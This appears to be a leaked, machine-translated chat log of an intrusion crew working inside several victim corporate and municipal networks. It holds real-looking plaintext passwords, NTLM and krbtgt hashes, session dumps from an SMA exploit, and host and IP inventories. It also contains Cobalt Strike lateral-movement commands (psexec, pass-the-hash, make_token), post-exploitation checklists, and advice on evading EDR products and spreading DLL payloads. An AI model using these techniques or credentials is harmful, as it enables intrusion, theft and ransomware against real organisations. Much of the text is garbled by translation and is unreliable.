check if another host is pinging this ipac which may be a cluster storage which will have the same ipi as the "normal" serverwhat is the overall progress? ok check from another point he does not even have admin$ change the server and accesses you have looked from one server sharina how is it[ ](https://mediaeveryone.com/group/sisd-net?msg=H2ocT3ZYwuoCEAst7) try from another point no session arrived, the delta is loaded what to do? if the server only ``t
Shares for DMZ-HyperV:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ClusterStorage$

``````
FINIIS1: 10.0.53.109 000
ESPTSK2: 10.0.53.57 000
RPTNET1: 10.0.53.60 000
ESPAPP4: 10.0.53.55 000
ADM-LASON: 10.0.51.63 000
VERSASQL: 10.0.53.98 000
ENSOR-HORIZON: 10.206.56.121 000 000
ADM-CARDACCESS: 10.0.51.61 000
ADM-XPEDITER: 10.0.51.45 000
ESPSQL1: 10.0.53.51 000
ESPAPP2: 10.0.53.53 000
CMP-TCH-51-60: 10.0.51.60 000
ADM-KMS: 10.0.61.87 000
ESPTSK1: 10.0.53.56 000
 
``when jampeon is sometimes more effective, not only psexec_psh
but also a regular psexech is pretty solid
where it doesn't start - you can try it with pipes
+ SISD-SQL01: 10.0.61.71
+ VDI-PROFILES: 10.0.61.20
+ T-HYPERV01: 10.0.53.231
+ HYPERV36: 10.0.53.247
+ SISD-SQL02: 10.0.61.72
+ EDHSVIDEO: 10.206.16.121
+ CTE-STORE01: 10.221.1.31
+ HYPERV22: 10.0.53.202
+ MONITOR: 10.0.51.78
+ BSE1-VIDEOSVR: 10.118.200.121
+ NOC-MASTER: 10.210.224.29
+ DWEVIDEOSVR: 10.120.200.121
+ DHCP01: 10.0.51.4
+ AHS-VIDEO: 10.11.200.121
+ VDI-SF01: 10.210.0.63
+ SCVMM: 10.0.254.69
+ HYPERV35: 10.0.53.246
+ DHCP02: 10.0.51.7
+ HYPERV34: 10.0.53.245
+ RIGHTFAX: 10.0.51.82
+ CTE-SQL01: 10.221.1.121
+ NOC-EX7: 10.210.224.74
+ HYPERV33: 10.0.53.244
+ HYPERV21: 10.0.53.201
+ HYPERV31: 10.0.53.242
+ HYPERV32: 10.0.53.243
+ HYPERV23: 10.0.53.203
+ HYPERV24: 10.0.53.204
+ CNS-HYPERV02: 10.0.53.212
+ T-HYPERV03: 10.0.53.233
+ T-HYPERV04: 10.0.53.234
+ HYPERV25: 10.0.53.205
+ VDI-SQL-01: 10.210.0.1
+ MMSVIDEOSVR: 10.52.200.121
+ JCEVIDEOSVR: 10.130.200.121
- MY-SISD-NFS: 10.0.61.61
- VIDEO-SOH: 10.13.200.122
- VDI-PVS: 10.210.0.40
- STU-HOME: 10.0.61.57
- T-HYPERV: 10.0.53.230
- SESROEVIDEOSVR: 10.116.200.121
- RIERHM-VIDEOSVR: 10.58.200.121
- SQLCLUSTER: 10.0.53.25
- VDI-PVS01-2: 10.210.0.51
- STU-SERVER: 10.0.50.1
- VDI-PVS02-1: 10.210.0.42
- VDI-XD02: 10.210.0.62
- VDI-PVS01-1: 10.210.0.41
- VDI-XD01: 10.210.0.61
- NPM-01: 10.0.51.84
- CAUSQLCL8wx: 10.0.53.24
- VDI-PVS02-2: 10.210.0.52
- CLARKE-SVE: 10.51.200.121
- TylerSISCluster: 10.0.53.26
- CATE-NAS: 10.0.61.69
``The servers do not overlap? yes see these two puffingThe second river is flowing185....113 the first is mine and the user7 and what is the second coba? we are each 55 pieces and in 2 cobas work out the first 200? there is one coba empty50/55 I have about 50% what is the overall progress? and the second?
[+] Looking for RADIUS domain creds
[+] Found radius domains, parsing
[!] Found radius domain creds
[+] aDfoj344*#l2eh2@192.168.188.64

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'PNGC-ACCTRDS-01 (Dual Monitors)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-01.pngc.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'PNGC-ACCTRDS-01 (Single Monitor)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-01.pngc.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 25, 'name': 'PNGC-RDS-01 (Dual Monitors)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-RDS-01.pngc.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 25, 'name': 'PNGC-RDS-01 (Single Monitor)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-RDS-01.pngc.com'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'PNGC-ACCTSQL-01 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.96'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'PNGC-ACCTRDS-01 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.97'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'PNGC-ACCTSQL-02 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.129'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'PNGC-ACCTRDS-02 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.128'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 44, 'name': 'PNGC-ACCTRDS-02 (Single Monitor)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-02.pngc.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 44, 'name': 'PNGC-ACCTRDS-02 (Dual Monitors)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-02.pngc.com'}
``````
[+] Checking URL https://205.236.0.43
[+] Found old SMA version (<9.x)
[+] Appliance running version 9.0.0.9-26sv

[+] Leaking sessions to dump configuration.
[+] Attempting to dump sessions from https://205.236.0.43
      [+] Found: SessionID: 1Ao1qakSkqZUQ1Yg1r1V8Z0n7l7l7axQdQUQAH4HgrtHQ= userType: 1 userName: abarter Password: warrenwitches Domain: pngcdomain
      [+] Found: SessionID: O1DgDOf7kN2aFj18o7YPz4hRCEUQj16ekh8Z18qBFE= userType: 1 userName: ajackson Password: tessakitty0625 Domain: pngcdomain
      [+] Found: SessionID: UkvbkafqdnyTOwAHibeL3GQY4Uy31VVdg8h0jqldA1g= userType: 1 userName: mdonovan Password: FUH@ck3rs! Domain: pngcdomain
      [+] Found: SessionID: b1CAsgAi6GwDG5Ab6yC9Z0Xj9cbl5axwogMpNoWpu24= userType: 1 userName: tstubblefield Password: LordofLords2 Domain: pngcdomain
[+] Done with https://205.236.0.43, found 4 sessions
These?
leeandmason.com L&M Domain 107.0.14.250 tl 127kk STOPPED 2fa need hot sessions

``````
pngc.com pngcdomain 205.236.0.43 user4 238kk STOPPED no valid accounts

``The first one is actually a town of some kind. Why them? Can I have these rewritten, please?
madison.il.us gisnet1 71.14.246.203
redwoodcity.org redwoodcity.org 76.14.0.148
canalbarge.com canalbarge 50.233.57.77

``I've got about an hour and a half here for sure, I've got about 30 minutes to start thinking,`` I've got 2fa somewhere if you need it,`` no luck yet? the tech guys should study in any case, for access to echi or other virtualization, and generally juicy data in the form of backup regulations, network maps and the like9 of 10 what will there mfat will hit in the carbon cloud
well it's technareid browsers is a bit of a wanker, i understand, but speaking of carbon, there are cases where the execution of any psch code in the network for example carbon by policies is perceived as an alert and sends a note to the admins Find the creed from carbon= )
well then let's start with the "task", what's the priority right now?
i think the study of the machines of technicians, it's probably the usual no-jouz, copying files, psekzek_command is quite a realistic solutionSo why "go" on the net? you have segments that you can not see? i do not quite understand how to go on the net Look at it as a useful practice "silent" work
otherwise there is no way = (the better the less tascas/randall/unsigned egos and the like then alas, carbone writes any anomalies, not only smallwar but also not just "out-of-the-box" invectives
it's a cloud SOC[ ](https://mediaeveryone.com/group/evo-com?msg=dTHei4MCgBJfC5NpX) I think not@tl1 have we started a dll here at all? if not - you can try psch pailoadych for protection functionscarbon even though EDR has a greater focus on whitelisting and account controlif you are ready today to urgently hack work on this network - I do not see the criminal in spreading dllTo see processes do not watch remotelyThis carbon stands everywhere, it is not even worth trying to slug the dll?nptywtf `SUDIGYFSDO^F&W67rfuSYRG^U67HGH `so you do not have dns and ldap anything in the domain + you do it from the dedicates?) give your hell, I have it removed in zeroinds better not touch, there is most likely a detector on ntsyutilad better reset, I clearly obsolete server without cb.exe in processes, there will be a chance to jump into the network there is a carbon` EVO\radmin 3v0r3port`
sure it's valid``.
Get list of DCs in domain 'evo.local' from '\\AZ-DC-2.evo.local'.
     CHEECH.evo.local [DS] Site: HQ2
    AZ-DC-2.evo.local [PDC] [DS] Site: evoAZURE
    HQ-DC-2.evo.local [DS] Site: HQ2
    HQ-DC-1.evo.local [DS] Site: HQ2
    AZ-DC-4.evo.local [DS] Site: evoAZURE

========================================================================

[*] EVO\Administrator
[*] EVO\Administrator Tmpl
[*] EVO\bduong
[*] EVO\bkruse
[*] EVO\bplehal
[*] EVO\bpratt
[*] EVO\cbbackup
[*] EVO\ceaton
[*] EVO\dhcpreg
[*] EVO\evoadmin
[*] EVO\hdryden
[*] EVO\iso Reset123
[*] EVO\isoutsource
[*] EVO\jcourtney May12011
[*] EVO\landerson
[*] EVO\lsoto
[*] EVO/MerakiVPNSrv
[*] EVO\mgentry
[*] EVO\nkiger L1m3_Gr33n
[*] EVO\qlyons
[*] EVO\radmin 3v0r3port
[*] EVO\sborn
[*] EVO\SBS Backup User
[*] EVO\searle
[*] EVO\ServerAdmin$
[*] EVO\spiceworks
[*] EVO\svc_mechanic
[*] EVO\SVC_PRTG
[*] EVO\svc_sqlmnt
[*] EVO\svc_sqlslave
[*] EVO\tadmin evo123 - disabled
[*] EVO\tfield
[*] EVO\tmusselwhite Guide12319
[*] EVO\ups
[*] EVO\veeam_vss
[*] EVO\vipreadmin
[*] EVO\vpnadmin

========================================================================

[*] Found users in enterprise admins
[*] \Administrator
[*] \iso
[*] \isoutsource
[*] \jtizon
[*] \manuelw
[*] \MerakiVPNSrv
[*] \nkiger
[*] \qlyons
[*] \sborn
[*] \ServerAdmin$
[*] \vipreadmin

========================================================================

scanuser abc123$ - VALID FOR DC

C:{Windows\system32> net localgroup "administrators"
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Administrator
EVO\Domain Admins
Roscoe
The command completed successfully.
``To minimize pvshya specially for you built a huge c# tulkitdotnet does not hinder AMSI and does not watch as pvshocheen please stop using verashell as much as possible where you can make do with dotnetblin, yeah.... I mean SharpView, not PowerView.
stop
what invoke? I've already written about both vpc and vpshshehe we'll find the logs from Misha, we started with him today it seems to output all in a row,just invoke-uchuchuchtuchtuchtuchtuchtuchtuchtucht if the user is not set, then it looks like something searches forhis error kicks out how so? sharpview does not search? not (sharpview know how to look for users too? super! Yes, you've got a Sharp sniper?hence it should "be able" to read them because it accesses domain controllers logsand you have to run it only from domain admin contexttry sharpsniperit's a good time to test it)we were looking for something like this, i think we found it on veraschel, search for keywords like network, admin, tech, etc. and allocate them from ad_users and use this tool to find their pc where will be valuable information about the network, just the same should be information about edr, backups, etc. in the problem "search for technicians "actually helps find nts assigned to users, gave you this stuff?```
https://github.com/HunnicCyber/SharpSniper
this is how you check if the current credentials are rolling on the remote pkvs make yourself a token lA for the supposed machine
second - respectively from kmd through >shell@tl2 prompted you)or wmic /node:10.225.10.200 process briefs \\10.225.10.200\c$test the easiest way to check access to the file system1) will not be better - because similarly dirty load will be generatedGood friends, please.
We now and in the future will be very often confronted with WPNs. I remember them as a whole + - by heart on the config and everything else, but in order to make it more convenient for everyone - please make a separate thread on the forum, where will lie installers VPN, guidance on finding config files vpnov on different operating systems, and other related to this type of access to the same
```
jump psexec64 10.225.10.200 https
```
pre-generates a dirty binary that could trick even a regular winndef, such attempts are almost guaranteed to create a securiti event-how to check here?) I think you already know what to check this way:
```
jump psexec64 10.225.10.200 https
```
wrong, because this token might not get access at runtime by itself, use primitive tokens, which only fail if access is wrong, or use make_token ```.
pth datacenter.local\adm.brodan0 06290576382001cd1da4c942e9fa0ca6
``I'll repeat the last time[ ](https://mediaeveryone.com/channel/general?msg=yHwrHWhtKpBocnuAK) let's get the passwords out of the vannott and move on to the eighth[ ](https://mediaeveryone.com/channel/general?msg=K4jfy6RjSGBrCRC2E) 2[ ](https://mediaeveryone.com/channel/general?msg=vgKtrJmq4LPeLYNQh) 1 or where is it from? they also have YES?) typo ninth) chetu.comdom.helpathome.com + found the "silent" servers?
dom.helpathome.com - @user9 and @user1
saiglobal.com - @user8
@user4 finish his (check.on.com), then joins saiglobal.comfiredi.com@user8 domain? he'll do it@tl1 passni saig @user8 then me and @user1 finish mywas 6 people - 3 grids) he's a priority too and finish them both to myself in dom.helpathome.com)[ ](https://mediaeveryone.com/channel/general?msg=cMScshjiqrspPvE3W) but @user8 says no sessions to him, which one of you is lying? it's for the future, when you make a listener for a pass you specify it + 443 port there domain saw beacons at https?):wink:where does it go where?When you do `spawn misha`pass - pass it to the domain? by the way + and notice that there and the ip is different and not the one you connect to the right do you see? open and look at your https nobody even looked at their listener in the coba) you asked the coba where the sessions passwhat domain?[ ](https://mediaeveryone.com/channel/general?msg=iPcyxH5o42hFED4T2) that's the coba's ip, and I need a domain, different domains see different trusts from 19 still enough of the colleagues above) there are two of them, right? what trusts are there?.161.126.162 gotovkobu where to pass the session or work from those that remained from there need to do, the other trusts + hell + av + backups then allocate 1 person on saiglobal.com all at the dekat all without a case now? dekat rebooted00 write plz how many trusts in domains domains.helpathome.comhappay.inn so please tell me what networks are up and running now?[ ](https://mediaeveryone.com/channel/general?msg=HrfgL9vcyE6NR2MMX) .[ ](https://mediaeveryone.com/channel/general?msg=kZc6hgGxJF65QRDgg) .@user8 where are you going? yes-all the groups? sec)+@tl1Add me to them herehare.add me to the confines of Stalinymm, and 1 that did not fly there not everything is so simple3 in the process until you can fall on the first 2 to the others, the third is still waiting? still a session flew in) or have not yet connected) but I think the domain disconnected (yes, I work with her now - my yesterday red do not touch it + 1 + that Dc-01 and this session is one grid?strange thingd1 came) yesterday's sessions or yesterday's? either pass each other in the cob sessions or give access to a partner, there as conveniently as possible take one for two are expected 3 pcsIn both eyes:flushed:okomonitor yesterday's cobFriver.local
two sessions - very hovering-sessions alive any?so good:sleeping:good morning)Good afternoon:space_invader:Cheerful morning)Quiet b\quiet night thank you all for todayThe important thing is that the mistakes are passed and the result is thereMolodyodtsy and took two DAD to tomorrows vps and dedikaminakosyali)until today to tomorrowtoday on the total time is already very much let's finishtakahe good option to look for svoith and check on the lpe we have in the network services, we check them in the case in situations to sort out theoretical up to search for the name of the dog admin as a password) well, and if it did not pass?)) poured in the archive, which was in the requirements for the reportitsituation is theoretical)ftp sploitvoprosy
almost all of us today do not have polzaki la
no credits (nowhere at all)
go up does not work
logically need to scan the network, look for 7/xp/sql and so on - and sploat them
let's say the kerb is still unhackable
keyloggers, fakelogons....
Inway
I might have missed something, but that's pretty much it.
what else interesting things can be done in such a situation? so, all poured files with hell and other things? yes, i checked on 4 phones at home - does not work on any of them tomorrow by 15 who do not know vpinp.net
```
User is not LA
creeds from browsers
AD info
Checked the non-ABA test domain
Got the LA\DA\EA lists
sitifno
ran the dll
Checked files on the machine that contain passwords.
Checked ad_computers for passwords.
trying to raise permissions (2020-076)
mimikatz value::creds
session crashed
``We've got a cart that's not working.helpathome.com
```
The user is not LA
browsers creds
AD info
Checked the non-AB\test domain
Got the LA\DA\EA lists
sitifno
ran the dll
Checked files on the machine that contain passwords.
Checked ad_computers for passwords.
trying to raise permissions (2020-076)
Share-Finder (process died)
GPPP-Pass
Invoke_Kerberoast
mimikatz value::creds
Ping machines in the domain
Portscan to standard ports
session crashed

session is back
kerb hash reset - started to check for validity
checked user - yes, password has not changed for a long time
tried to check validity via net use - got syntax error
session crashed
``@user7 didn't you get a session? collected information from the machine adinf, sylbelt, sharpweb, rubeus kerb, invok kerb, tried no gpp (found nothing)
ran through the folders.
went from ad coputers to windows 2003 and HP.
pinged them and made a list
Alexei connected and on one of the vin 2003 machines he brought up the system
with the YES Credentials filled in the dll and started it up.
took hashes from the dc
started to complete the list of servers, decided to make life easier leha script and fakal doc over which sat all this time as got hell infogroups were, the current user does not enter them anyone had such a situation with LA as I described? that there is no direct reference to the current user, but there are other groups?
Received session:
	UserName: forstern (not a local admin)
	HostName: SHO-LT-4726W10
	Domain: bnpmedia.com

Got it:
	AdFind
	DCs
	DA
	EA
	LA (SHO-LT-4726W10)
	SeatBelt
	WinPeas
	Kerb-hash (Rubeus)
	1 password from browser (SharpWeb) by MSOutLook

It didn't work:
	CVE-2020-0796 - session in system context did not spawn, no error
	Net-GPPPasswords.exe - it parried, it did not give me any credits
	Invoke-Kerberoast.ps1 - gave an error that there were no users for kerberoast
	smb_login - ran MSOutLook password on the current subnet, no machine
			came up
	SharpChrome - didn't give out any credits

Did not have time:
	MS_17_010 - Built OS: Windows XP, 7, Server 2003, 2008, had time to ping not all, planned to run ms_17_010_psexec on successfully pinged.

Also sorted the servers into groups.

OpenVPN and ScreenConnector configurations were found on the computer.
OpenVPN could not be deployed on the harddisk.
``````
*CHETU.COM
unchecked AD info
removed net accounts /dom net group "domain admins" /dom net group "enterprise admins" /dom
stripped the invoke-kerberos and gave them to the brute force
SeatBelt + winPEAS
CharpChrome - pulled out 10 passwords that fit the length of the domain requirements.
Raise the privileges did not work, in spite of the not updated Windows
From ad_computers I checked out the server computers and added pings to the list.
Found a backup file OneNote passwords.one (On 8-27-2020).one on the system.
Prepared a list of interesting files on the FS (unattend and office docks)`` just the first line of the message to the "report" the name of the confiTo know where there is a situation write more immediately on what grid plizharrau.in
```
1) Take off the browser Credits Chrome and then all the rest
2) Take off AD_Users
3) take off YES
4) removed local
5) Remove mimic
6) Collected password files
7) Halfway through the system
8) Started looking at the network for further movement
9) Sorting data
10) Preparing reports

The connection is lost.

```
friver.local
```
Helping User7

1) Checked subnets
2) Chose a subnet, checked on ms17 found one car, threw the session in the armitage
3) Took down hashdam and mimic.
4) Found YES.
5) Got a dump from DS.

```
https://mediaeveryone.com/channel/general?msg=8Wui2GjymD9ouq2fJобмен experience peculiar) suddenly someone will have good thoughts on the problems of another let everyone understand the situation on the grids write directly here where to write? \For each of your grids write overall score for today, what's up, what's done, what worked, what did not work, questions, let's probably summarize the results todayhodu too long search, missed the opportunity to that another kobu try to `s?
AHyHax beacon> spawn https
ahyHax beacon> beacon https
ap.panavision.com
==================


DC

SYD-DCON-02
SYD-DCON-01
AUS-DCON-01

----------------

EXCHANGE

SYD-EXCH-00
AKL-DCON-02

----------------

SQL

SYD-MSSQL-01
SYD-APPS-02
SYD-ALMS-01
SYD-ITAP-01

----------------

FILE SERVERS

AKL-FILE-01
AKL-FILE-02
SYD-FILE-01
MEL-FILE-02

----------------

WSUS

SYD-WSUS-01

----------------

could not find host

AUS-RDSB-01
SYD-ITNET-01
SYD-APIT-01 - timeout
SYD-APPS-01

----------------

HYPER-V

AKL-HYPV-01
SYD-HYPV-01
MEL-HYPV-01
AUS-DCON-02

----------------

PDQDeployService

SYD-PDQM-01

----------------

PRINT SERVER

SYD-PRNT-01

----------------

DPM

SYD-DPMS-02


----------------






??
SYD-ITMG-01 - orcestrator?

SCCM / WSUS often see other segments and 95 more servers which are not distributed
na.panavision.com
=================

DHCP

ATL-DHCP-01
NYC-DHCP-01
WDH-DHCP-01

-------------------

DC

DEN-DCON-02
DEN-DCON-01
WDH-DCON-02

-------------------

EXCHANGE

PNA-BURDC-02
PNA-ALBDC-01
NOL-DCON-02
PNA-WHEXCH-01
PNA-WHEXCH-02
GBL-EXCH-01

-------------------

MSSQL

WDH-SWSS-01
DEV-WIND-01
SQL-WH-03
GBL-SWSS-01

-------------------

VEAM

WDH-VEAM-01
WDH-VEAM-02

-------------------

SCCM

DEN-SCCM-01

-------------------

WSUS

DEN-WSUS-01

-------------------

FILE SERVERS

TOR-FILE-01
VAN-FILE-01
NOL-FILE-01
WDH-FILE-02
CHI-FILE-01
WDH-FILE-01
DAL-FILE-01

-------------------

Terminal Server License Servers

GBL-RDSB-01

-------------------

SQL

PNA-SQLREP-02
GBL-SQL-01
DEV-MSQL-01
DEN-ESQL-01
DEV-MSQL-02
DEV-SQLM-01
DEN-SQLP-01
DEN-SQLR-01
DEN-SQLU-01
DEN-SQLA-01
DEN-SQLM-01
DEN-SQLS-02
WDH-WIND-01
WDH-WIND-TST
WDH-PRNT-01
DEN-MDPM-01
WDH-NAVI-01

-------------------

Hyper-V


PNA-HYPV-06
PNA-HYPV-01
PNA-HYPV-03
HWD-HYPV-01
GBL-HYPV-01
PNA-HYPV-04
PNA-HYPV-02
PNA-HYPV-05
BUR-HYPV-01
VAN-HYPV-01
NYC-HYPV-01
ALB-HYPV-01
TOR-HYPV-01
CHI-HYPV-01
ATL-HYPV-01
NOL-HYPV-01
WDH-HYPV-01
PNA-HYPV-CL

-------------------

Sharepoint

DEN-SHAR-01
DEN-SHAR-02
DEV-SHAR-01
DEN-SHAR-03
DEN-APPS-02
DEN-PVSN-01
DEV-MSPS-16

-------------------

RDS

GBL-RDSH-03
GBL-RDSH-01
GBL-RDSH-02
GBL-RDSH-04
DEN-RDS-01
DEN-RDS-02
DEV-MSGP-01

-------------------

Disabled Servers

DEN-APPS-01
DEN-ENGS-01
DEV-GPER-01
ENG-WH-01X
EREQDEV
PNA-APPFS-01
PNA-RTRC-01
PNA-WEBAPPS-01
PNA-WHGP-01
DEV-MOOS-00

-------------------

Nutanix AHV.
(Virtualization is no longer a complex layer of the IT stack that is licensed, deployed, and managed separately.  Nutanix AHV offers a secure, enterprise-grade virtualization solution that streamlines operations).

DEN-CMDB-01
DEN-DVOP-03
DEN-ECOM-01
DEN-EREQ-01
DEN-PDQS-01
DEN-RTRC-01
DEV-MIIS-01
EREQUEST
GBL-ADFS-01
GBL-BIGS-01
GBL-MSDS-01
GBL-TMDS-00
PNA-WHSBX-02

-------------------

Please check the name and try again

DEV-GPUG-01
GBL-SWAS-01
PNA-SP-01
WDH-OMSA-01

-------------------

FILESTORAGE?

(Azure Backup with antivirus)

PNA-ALBFS-01
PNA-BURFS-02
PNA-HWDFS-02
PNA-NYCFS-02
DEN-STFS-01

-------------------

HTTPD

WDH-CCTV-01

-------------------

SolarWinds

WDH-SWAS-01

-------------------


PNA-ATLFS-02 Request timed out.
WDH-WDSS-01 Request timed out.
```shell adfind.exe -b dc=standards,dc=com,dc=au -f "(objectcategory=organizationalUnit)" > C:\Programdata\standards_ad_ous.txtshell nltest /dclist:c360.losal is@user1 @user3 catch it should be careful because it is quite strong floods I'll tell you this, 3 times in a row run, admins will burn the network load and throw everyone)server and user OS it checks the balls on each pc in the domain I was more about the algorithm itself `` ``
performs two functions at once, if we start it from a user context and see immediately available ADMIN$ balloons - it means we are local admin there and can already move there
if there are no such machines in the network - at least we get a list of available balls for reading, which may contain information relevant to upgrade privileges
You understand how shuffinder works, don't you? and it's server subnets at this scale are better to scan /24. So you need 20 domains, take off the ad_computer, ping the servers and connect the port? no, in 1 domain) in each domain?of the pluses, there is already YES, from the minuses there are still 19 trusts, I'll tell you when I runWe have automatic spoiling on such fruitovorov they pass you and see that you on 10 sessions in the cobs did not fructify, I pass @user1 @user3 sessions on the casexDseek ways to the cloud, look for the cradleshttp://arhangel.ru/fortune/online/taro/maps will prompt the right pathalgorithm is clear, but if the AV will be cloud and his server is not in the network?)hell certainly do not need to remove, but you can)well algorithm is clear, go fix the same, but is it enough for you?)portscans sorting this is it allDemolish hellDemolish hellThat's what we were doing on Saturday So, let's move on to the practice of networkOopsy made a mistake, let's move on )who and where?)
We haven't worked with them for the last 30 minutes. Why did you kill all the sessions?
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2bd07805e537f32fe65cdb7ec1ac64c6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```
```
	 * Username : bstangea
	 * Domain : RTPCO
	 * NTLM : f13d2f88fdf2a0970db1ece9ce90bc57

Local Group Memberships *iDRAC-Admins *Netmon Users
                             *StorageAdmin *VMWare-Admins
                             *VMWare-Admins-Alloy *VSA_Users
Global Group memberships *VSA_Admins *Test_Alloy
                             *IT *SQL Server Admins
                             *testgroup1 *RTP-Admins_Ent
                             *TestShare *RTP-IT-Admins
                             *Domain Users *O365_Sync
``I just got the second one13 minutes ago 1 flew in. Is there a second one? If it doesn`t come in it means the coba is blocked and 20 minutes ago Kasya can`t see it```.
====== AntiVirus ======

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

  Engine : Kaspersky Endpoint Security 10 for Windows
  ProductEXE : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Endpoint Security 10 for Windows SP2\wmiav.exe
  ReportingEXE : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Endpoint Security 10 for Windows SP2\x64\wmi64.exe
I thought it wasn't mentioned out loud,and vindef octo it's clear where avp visit is from.Just if it's related to kasper by any chance? I noticed it later,well kasper[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=SHJHSBqfenpxjBRxe) it's about?
 3356 576 LockApp.exe x64 1 RTPCO\amcnally
 4120 892 avp.exe
 5244 4120 avp.exe x86 1 RTPCO\amcnally
 4848 892 securityHealthService.exe
 11600 4340 MSASCuiL.exe x64 1 RTPCO\amcnally
``only the cassay process is not red votsimantec and cassayan is still the same```
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] SISIPSFileFilter.sys Found
[+] 1 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] Symantec Found!
```
```
 4292 892 KaseyaEndpoint.exe
so when you were sitting on 1pc all together and tried to get into the trust it was unsuccessful they clean up anchors, sessions, in general everything they can clean up)[ ](https://mediaeveryone.com/group/saiglobal-com?msg=s4LNHXhgaMfybMpmb) another thing, so even if they brought a cob from outside, pass it on their own what's the point in it?@user8 reread the message above or in the same and stay in the same and from that koba already on the trusts in lycznyetuda fuck the servervot there is a koba from which we have not worked with this domain yet i told you about it and a good thing to try it was necessary to ping from the server where you want a session 1 koba that can get a session and so the question was you do not have a session on the inbound router and you do not get any sessions from anywhere and now you sit on the same server and traffic flies to your domains and other things at this point there sat their IT guys and watched the traffic if you all crowded on one server and each had a session analyze the traffic and cut off segmentsadmins do what?when you raised a fuss in the network the last time we did it for a week, we were scattered across the trusts+[ ](https://mediaeveryone.com/group/saiglobal-com?msg=8gSx7ucdX2qwNQcZS) everyone had active sessions on the cob? and from there to personal spavnit there to get from the same test .66 so if we from all personal cob were there anyway, maybe it makes sense to try from a cob that we have not touched yet?how copied and to which servers did it have time to run? so mb palyat not dll and koba?) give me a bin i will make another cryptohesh change from rebuildadrecreate, re-cryptadlki chopped av, something will change from re-create?
user1 got a session, from hell got a server, pinged it
pinged the servers that are pinged spread our dlls and run
right? domain where to passI'm also the last one and fuck up here already finale will give you another session if there is a back, pass the user1 - he will spread us across the servers, yes, fucked up.... how did you try? right, while trying to spread it flew away so i understand no one outside the current machine, there are more backs?
our sessions flew off...so far only the dog is getting fucked up :thinking:
if you're pinging the name and catch 100% loss then there is a chance that the server just turned off the replica to the ping command, or fv interfere or other reasons what else do not do? if no yuz - access dendied, user or password wrong immediately do not touch, you're asking about 445, so there is a variant, or you confuse me already?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=XmYaJLHszyi2pttqa) if you read the errors, you won't lock[ ](https://mediaeveryone.com/group/saiglobal-com?msg=Z5zKpqTJrL9hpr8S5) if you get a dns request that he does not see the name, how do you even want to interact?
net use with the credentials?
I can't ping 10.225.10.200, it's datacenter.local, how do I even communicate with it?
Just to be clear.
```
beacon> portscan 10.225.10.200 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 10.225.10.200
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
?and 445 is open? if the domain is not pinged is it possible to remove something from it? in all other we have? above file update the visible trastnu if visible by itself it is already possible but it is pinged and possible so if c360 in quarantine, is there any sense to go to it? do not kill this live
make_token saig.frd.global\svc_actifio B0b@f3tt
```saig.frd.global\what domain is it? is it not active (can we make tickets from one domain to another? you should check when it has a pass) and is it on or off? if we have
```
502 krbtgt 21dbd0c360e58ac61e4ae83052f1c582 514
```
what can we do about it?
Remind me please) other domains will be here soon and they started in orderdxink was taken on tuesday
took a user who has not changed the password since last month in the start domain (just checked), and in c360 apparently changed the password))) they will not just sit and wait)[ ](https://mediaeveryone.com/group/saiglobal-com?msg=ZDZp8BjrNibbDXpfF) logically, since the admins knew about us full flight we changed passwords from DAudal ad_user above plesloknet through shell dir \faque.rex\C$ if you check the validity of the user it will not lock in case of what? fuck the user did not finish downloading in legalco and c360 also can not get not only him well they obviously felt the fuck and closed the data center from here and got@user8 from yesterday in the domain?
beacon> shell nslookup 10.225.10.200
[*] Tasked beacon to run: nslookup 10.225.10.200
[+] host called home, sent: 53 bytes
[+] received output:
*** Request to UnKnown timed-out

DNS request timed out.
    timeout was 2 seconds.
Server: UnKnown
Address: 10.225.12.200

DNS request timed out.
    timeout was 2 seconds.

The old one should not be overwritten. It would be a good idea to update hell info on the current domainscheknitednsync pinged as well as c360 and almost everything in quarantine13 instead of 19)``
dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/08-09:59:39 Eastern Daylight Time
>name: datacenter.local
